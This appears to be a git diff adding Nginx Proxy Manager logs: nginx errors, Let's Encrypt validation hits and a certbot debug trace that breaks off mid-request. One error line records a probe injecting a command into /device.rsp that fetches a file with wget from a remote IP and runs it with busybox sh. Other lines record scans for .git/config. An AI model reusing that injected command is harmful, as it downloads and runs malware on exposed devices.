2026/02/14 22:32:24 [error] 201#201: *1 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/31481293126031" failed (2: No such file or directory), client: 222.117.41.51, server: localhost-nginx-proxy-manager, request: "GET /.well-known/acme-challenge/31481293126031 HTTP/1.1", host: "mail.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:16:43 [error] 406#406: *452 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 213.209.159.181, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "222.117.41.51"
|
||||||
|
2026/02/14 23:26:45 [error] 444#444: *515 open() "/var/www/html/device.rsp" failed (2: No such file or directory), client: 130.12.180.151, server: localhost-nginx-proxy-manager, request: "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3B%20busybox%20rm%20bbc%3B%20wget%20http%3A%2F%2F130.12.180.151%3A8080%2Ffile%2Fbbc%3B%20busybox%20sh%20bbc HTTP/1.1", host: "222.117.41.51:80"
|
||||||
|
2026/02/14 23:37:17 [error] 509#509: *766 open() "/var/www/html/login.asp" failed (2: No such file or directory), client: 195.3.221.86, server: localhost-nginx-proxy-manager, request: "GET /login.asp HTTP/1.1", host: "222.117.41.51:80"
|
||||||
0
npm/data/logs/fallback_stream_access.log
Normal file
0
npm/data/logs/fallback_stream_access.log
Normal file
21
npm/data/logs/letsencrypt-requests_access.log
Normal file
21
npm/data/logs/letsencrypt-requests_access.log
Normal file
@@ -0,0 +1,21 @@
|
|||||||
|
[14/Feb/2026:22:37:03 +0000] 200 - GET http www.hanmocnn.co.kr "/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo" [Client 23.178.112.212] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:22:37:04 +0000] 200 - GET http www.hanmocnn.co.kr "/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo" [Client 18.222.135.176] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:22:37:04 +0000] 200 - GET http www.hanmocnn.co.kr "/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo" [Client 13.215.201.135] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:22:37:04 +0000] 200 - GET http www.hanmocnn.co.kr "/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo" [Client 56.228.19.145] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:22:37:05 +0000] 200 - GET http www.hanmocnn.co.kr "/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo" [Client 54.218.246.213] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:22:59:04 +0000] 200 - GET http asset.hanmocnn.co.kr "/.well-known/acme-challenge/_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs" [Client 23.178.112.108] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:22:59:05 +0000] 200 - GET http asset.hanmocnn.co.kr "/.well-known/acme-challenge/_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs" [Client 13.229.225.246] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:22:59:06 +0000] 200 - GET http asset.hanmocnn.co.kr "/.well-known/acme-challenge/_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs" [Client 44.249.164.249] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:22:59:06 +0000] 200 - GET http asset.hanmocnn.co.kr "/.well-known/acme-challenge/_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs" [Client 13.51.200.205] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:22:59:07 +0000] 200 - GET http asset.hanmocnn.co.kr "/.well-known/acme-challenge/_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs" [Client 18.222.8.98] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:23:36:13 +0000] 200 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" [Client 23.178.112.211] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:23:36:15 +0000] 200 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" [Client 18.222.30.235] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:23:36:16 +0000] 200 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" [Client 18.138.231.223] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:23:36:16 +0000] 200 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" [Client 44.249.164.249] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:23:36:17 +0000] 200 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" [Client 13.48.49.154] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[15/Feb/2026:01:51:53 +0000] 200 - GET http git.hanmocnn.co.kr "/.well-known/acme-challenge/lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0" [Client 23.178.112.107] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[15/Feb/2026:01:51:54 +0000] 200 - GET http git.hanmocnn.co.kr "/.well-known/acme-challenge/lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0" [Client 47.129.179.70] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[15/Feb/2026:01:51:54 +0000] 200 - GET http git.hanmocnn.co.kr "/.well-known/acme-challenge/lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0" [Client 13.61.182.40] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[15/Feb/2026:01:51:54 +0000] 200 - GET http git.hanmocnn.co.kr "/.well-known/acme-challenge/lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0" [Client 34.211.230.189] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[15/Feb/2026:01:51:55 +0000] 200 - GET http git.hanmocnn.co.kr "/.well-known/acme-challenge/lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0" [Client 18.218.54.218] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[15/Feb/2026:01:52:03 +0000] 404 - HEAD http git.hanmocnn.co.kr "/" [Client 192.64.113.146] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0" "-"
|
||||||
0
npm/data/logs/letsencrypt-requests_error.log
Normal file
0
npm/data/logs/letsencrypt-requests_error.log
Normal file
409
npm/data/logs/letsencrypt.log
Normal file
409
npm/data/logs/letsencrypt.log
Normal file
@@ -0,0 +1,409 @@
|
|||||||
|
2026-02-15 01:53:21,924:DEBUG:certbot._internal.main:certbot version: 5.3.0
|
||||||
|
2026-02-15 01:53:21,925:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot
|
||||||
|
2026-02-15 01:53:21,925:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-7', '--agree-tos', '--authenticator', 'webroot', '-m', 'windpacer@hanmocnn.co.kr', '--preferred-challenges', 'http', '--domains', 'git.hanmocnn.co.kr']
|
||||||
|
2026-02-15 01:53:21,925:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot)
|
||||||
|
2026-02-15 01:53:21,939:DEBUG:certbot._internal.log:Root logging level set at 30
|
||||||
|
2026-02-15 01:53:21,940:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
|
||||||
|
2026-02-15 01:53:21,940:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot
|
||||||
|
Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported).
|
||||||
|
Interfaces: Authenticator, Plugin
|
||||||
|
Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins')
|
||||||
|
Initialized: <certbot._internal.plugins.webroot.Authenticator object at 0xffff93ff0390>
|
||||||
|
Prep: True
|
||||||
|
2026-02-15 01:53:21,941:DEBUG:certbot._internal.plugins.selection:Selected authenticator <certbot._internal.plugins.webroot.Authenticator object at 0xffff93ff0390> and installer None
|
||||||
|
2026-02-15 01:53:21,941:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None
|
||||||
|
2026-02-15 01:53:22,173:DEBUG:certbot._internal.main:Picked account: <Account(RegistrationResource(body=Registration(key=None, contact=(), agreement=None, status=None, terms_of_service_agreed=None, only_return_existing=None, external_account_binding=None), uri='https://acme-v02.api.letsencrypt.org/acme/acct/3064386906', new_authzr_uri=None, terms_of_service=None), ce2ddac5740bb12d4d6591b7fa1728af, Meta(creation_dt=datetime.datetime(2026, 2, 14, 22, 37, tzinfo=datetime.timezone.utc), creation_host='312f7928d5ba', register_to_eff=None))>
|
||||||
|
2026-02-15 01:53:22,174:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory.
|
||||||
|
2026-02-15 01:53:22,177:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443
|
||||||
|
2026-02-15 01:53:22,749:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033
|
||||||
|
2026-02-15 01:53:22,750:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sun, 15 Feb 2026 01:53:22 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 1033
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change",
|
||||||
|
"meta": {
|
||||||
|
"caaIdentities": [
|
||||||
|
"letsencrypt.org"
|
||||||
|
],
|
||||||
|
"profiles": {
|
||||||
|
"classic": "https://letsencrypt.org/docs/profiles#classic",
|
||||||
|
"shortlived": "https://letsencrypt.org/docs/profiles#shortlived",
|
||||||
|
"tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient",
|
||||||
|
"tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver"
|
||||||
|
},
|
||||||
|
"termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf",
|
||||||
|
"website": "https://letsencrypt.org"
|
||||||
|
},
|
||||||
|
"newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct",
|
||||||
|
"newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce",
|
||||||
|
"newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order",
|
||||||
|
"qw5aGjGdqUs": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417",
|
||||||
|
"renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info",
|
||||||
|
"revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert"
|
||||||
|
}
|
||||||
|
2026-02-15 01:53:22,751:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for git.hanmocnn.co.kr
|
||||||
|
2026-02-15 01:53:22,755:DEBUG:acme.client:Requesting fresh nonce
|
||||||
|
2026-02-15 01:53:22,756:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce.
|
||||||
|
2026-02-15 01:53:22,931:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0
|
||||||
|
2026-02-15 01:53:22,931:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sun, 15 Feb 2026 01:53:22 GMT
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: qLPTsdtf371F2dHjmpzxyQJyT53Irn_ns9AHyC1ZS59P7cma1yM
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
|
||||||
|
2026-02-15 01:53:22,932:DEBUG:acme.client:Storing nonce: qLPTsdtf371F2dHjmpzxyQJyT53Irn_ns9AHyC1ZS59P7cma1yM
|
||||||
|
2026-02-15 01:53:22,932:DEBUG:acme.client:JWS payload:
|
||||||
|
b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "git.hanmocnn.co.kr"\n }\n ]\n}'
|
||||||
|
2026-02-15 01:53:22,938:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZjM3MUYyZEhqbXB6eHlRSnlUNTNJcm5fbnM5QUh5QzFaUzU5UDdjbWExeU0iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9",
|
||||||
|
"signature": "WyHKdWrWbQ3LclhqvkOiUGsvL-CRTBoVdK5ZhXGtBeDbrprDu_5gAF-rZmoTaxKICx7JLIJmM6x5eGmUqtQPRkz-pdGzbKVYOH8tNRZmS_UlP4Xme44N2b8XsV1LfEREEi4gE7Xoltvv1WZVTa5pH2OMAV0W2qivo_rw2pvjJcAUBvbJ-LjWw8bwWgZA-V9D8y1QCNnnnygWv7MzYlqyqQdFdoFtLR_jULsyPkLr0_O1VYQ63kfGQvlu7LcIx6CigQytrQe6xjCQMfagSFHTbCUomU95CAsGkKCGG8zdcY5gxAGq9aUtCDh1ckj1i7JlxT7VG8Gw94Fm1-3xyoIvVg",
|
||||||
|
"payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogImdpdC5oYW5tb2Nubi5jby5rciIKICAgIH0KICBdCn0"
|
||||||
|
}
|
||||||
|
2026-02-15 01:53:23,207:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 350
|
||||||
|
2026-02-15 01:53:23,208:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 201
|
||||||
|
Server: nginx
|
||||||
|
Date: Sun, 15 Feb 2026 01:53:23 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 350
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480409206716
|
||||||
|
Replay-Nonce: QkEzerAfewKqCm7D8TxtCV9igelQqU_6LxnLw93BuTLlqGVqyto
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"status": "ready",
|
||||||
|
"expires": "2026-02-22T01:53:23Z",
|
||||||
|
"identifiers": [
|
||||||
|
{
|
||||||
|
"type": "dns",
|
||||||
|
"value": "git.hanmocnn.co.kr"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"authorizations": [
|
||||||
|
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036"
|
||||||
|
],
|
||||||
|
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480409206716"
|
||||||
|
}
|
||||||
|
2026-02-15 01:53:23,208:DEBUG:acme.client:Storing nonce: QkEzerAfewKqCm7D8TxtCV9igelQqU_6LxnLw93BuTLlqGVqyto
|
||||||
|
2026-02-15 01:53:23,208:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-15 01:53:23,213:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZmV3S3FDbTdEOFR4dENWOWlnZWxRcVVfNkx4bkx3OTNCdVRMbHFHVnF5dG8iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4ODM5NDYyMDM2In0",
|
||||||
|
"signature": "aRcOzVryk7N-epoq94qMQaMnoZRc7CwSkyd9ho6LopgW7DQ9gEmTr8Wz_tImoO_K94ggGlP4u9A77STJT3qzgT7WfBRV_fbtX65jr721Gczj7p-uqUQZXgc0trtw86vR47hXaEHgiNAwcO3XfgsP_V2uTr6h3M2vDw_89Aogg7YRVJruSAIK4sOkUbAOV0JjtxMwPO8ks-tnfpJQ0w-XW-wJ7B9ipQG9h9vWDZAvK2MOgZOoqJVQjUy1_urnkpXXmE-083hikkbzsyLXXAa-P5GcW6KgHV-frj0ejgQVJMLjh6U4YmyH-7HImx7kCQD_rtQ6qQSVgC6Q4SUNBx7hGA",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-15 01:53:23,391:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658839462036 HTTP/1.1" 200 777
|
||||||
|
2026-02-15 01:53:23,392:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sun, 15 Feb 2026 01:53:23 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 777
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: QkEzerAfRd3ApU9wqlGKFrr8ynXUod788KPNiE_LCow1T_uNR3k
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "git.hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "valid",
|
||||||
|
"expires": "2026-03-17T01:51:57Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/WBcYRQ",
|
||||||
|
"status": "valid",
|
||||||
|
"validated": "2026-02-15T01:51:51Z",
|
||||||
|
"token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0",
|
||||||
|
"validationRecord": [
|
||||||
|
{
|
||||||
|
"url": "http://git.hanmocnn.co.kr/.well-known/acme-challenge/lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0",
|
||||||
|
"hostname": "git.hanmocnn.co.kr",
|
||||||
|
"port": "80",
|
||||||
|
"addressesResolved": [
|
||||||
|
"222.117.41.51"
|
||||||
|
],
|
||||||
|
"addressUsed": "222.117.41.51"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-15 01:53:23,392:DEBUG:acme.client:Storing nonce: QkEzerAfRd3ApU9wqlGKFrr8ynXUod788KPNiE_LCow1T_uNR3k
|
||||||
|
2026-02-15 01:53:23,392:DEBUG:certbot._internal.client:CSR: CSR(file=None, data=b'-----BEGIN CERTIFICATE REQUEST-----\nMIIBKTCBrwIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE7ZAcanp3QlMenYln\nHTD7y/aMNQsYPRK/GPbY52fqKJTuDETZiujJiW2ouXb36OiEHOeqiBh0CeEBas1C\n+6FetlNbP9eEZFeW4EAyUJpSyY8fzUrbz1+74Gy/NO1zCCSeoDAwLgYJKoZIhvcN\nAQkOMSEwHzAdBgNVHREEFjAUghJnaXQuaGFubW9jbm4uY28ua3IwCgYIKoZIzj0E\nAwIDaQAwZgIxAIX8GWa4RGMhJGbNLWSR+POe/0WtswWV8x3F0RAfRNUSKtajsegi\nS8p0E8O7yzY4egIxAP4lsygfSMg8agBLYJwIv1VEiPTgp/zFAbI/AZoZqarecqWW\n2FJMR0Y6bW7QwCaCTA==\n-----END CERTIFICATE REQUEST-----\n', form='pem')
|
||||||
|
2026-02-15 01:53:23,393:DEBUG:certbot._internal.client:Will poll for certificate issuance until 2026-02-15 01:54:53.393497
|
||||||
|
2026-02-15 01:53:23,394:DEBUG:acme.client:JWS payload:
|
||||||
|
b'{\n "csr": "MIIBKTCBrwIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE7ZAcanp3QlMenYlnHTD7y_aMNQsYPRK_GPbY52fqKJTuDETZiujJiW2ouXb36OiEHOeqiBh0CeEBas1C-6FetlNbP9eEZFeW4EAyUJpSyY8fzUrbz1-74Gy_NO1zCCSeoDAwLgYJKoZIhvcNAQkOMSEwHzAdBgNVHREEFjAUghJnaXQuaGFubW9jbm4uY28ua3IwCgYIKoZIzj0EAwIDaQAwZgIxAIX8GWa4RGMhJGbNLWSR-POe_0WtswWV8x3F0RAfRNUSKtajsegiS8p0E8O7yzY4egIxAP4lsygfSMg8agBLYJwIv1VEiPTgp_zFAbI_AZoZqarecqWW2FJMR0Y6bW7QwCaCTA"\n}'
|
||||||
|
2026-02-15 01:53:23,398:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480409206716:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZlJkM0FwVTl3cWxHS0Zycjh5blhVb2Q3ODhLUE5pRV9MQ293MVRfdU5SM2siLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2ZpbmFsaXplLzMwNjQzODY5MDYvNDgwNDA5MjA2NzE2In0",
|
||||||
|
"signature": "Bi6hElJl4Oyw45hxpguXUi4m-kHZxLB2eQwSvZ_zg6ud2TTcA3XEHKrII60OeSqKdIEQi6OPJiRjkzd1ezPGXdkJLpCJ6MROCMBuuzZ_txS5Yx5uwnwLe7cX2VXZ3cf4L5HjYM_3mYt9kPO4ByiXhELIMeALK7ngR5_2y8ej-wXhYpl-lm95-ZrqV7oxVSt3Mx4uNAgG8-kP3_-WQVjGppZzzVmRWFZ3plfzut2Cp9lRNDfi_TvQkQ4NXjK0WbXJDxvti07fkwjXutpEpbYz4heqp-PaxRY09KMGbenbjj0O2vkbD_RA9Zzv0nswGLrvVmS4pe5wFiOKpur3-l1EJQ",
|
||||||
|
"payload": "ewogICJjc3IiOiAiTUlJQktUQ0Jyd0lCQURBQU1IWXdFQVlIS29aSXpqMENBUVlGSzRFRUFDSURZZ0FFN1pBY2FucDNRbE1lbllsbkhURDd5X2FNTlFzWVBSS19HUGJZNTJmcUtKVHVERVRaaXVqSmlXMm91WGIzNk9pRUhPZXFpQmgwQ2VFQmFzMUMtNkZldGxOYlA5ZUVaRmVXNEVBeVVKcFN5WThmelVyYnoxLTc0R3lfTk8xekNDU2VvREF3TGdZSktvWklodmNOQVFrT01TRXdIekFkQmdOVkhSRUVGakFVZ2hKbmFYUXVhR0Z1Ylc5amJtNHVZMjh1YTNJd0NnWUlLb1pJemowRUF3SURhUUF3WmdJeEFJWDhHV2E0UkdNaEpHYk5MV1NSLVBPZV8wV3Rzd1dWOHgzRjBSQWZSTlVTS3RhanNlZ2lTOHAwRThPN3l6WTRlZ0l4QVA0bHN5Z2ZTTWc4YWdCTFlKd0l2MVZFaVBUZ3BfekZBYklfQVpvWnFhcmVjcVdXMkZKTVIwWTZiVzdRd0NhQ1RBIgp9"
|
||||||
|
}
|
||||||
|
2026-02-15 01:53:24,814:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/finalize/3064386906/480409206716 HTTP/1.1" 200 454
|
||||||
|
2026-02-15 01:53:24,815:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sun, 15 Feb 2026 01:53:24 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 454
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480409206716
|
||||||
|
Replay-Nonce: QkEzerAf-62VIy5uF6WKUM_0j4Ve47MTMI-BkVhP5zXT1TfCzrk
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"status": "valid",
|
||||||
|
"expires": "2026-02-22T01:53:23Z",
|
||||||
|
"identifiers": [
|
||||||
|
{
|
||||||
|
"type": "dns",
|
||||||
|
"value": "git.hanmocnn.co.kr"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"authorizations": [
|
||||||
|
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036"
|
||||||
|
],
|
||||||
|
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480409206716",
|
||||||
|
"certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/063a2da28b00b2f267a3cd169337c07ad9a2"
|
||||||
|
}
|
||||||
|
2026-02-15 01:53:24,815:DEBUG:acme.client:Storing nonce: QkEzerAf-62VIy5uF6WKUM_0j4Ve47MTMI-BkVhP5zXT1TfCzrk
|
||||||
|
2026-02-15 01:53:25,816:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-15 01:53:25,820:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480409206716:
|
||||||
|
{
|
||||||
|
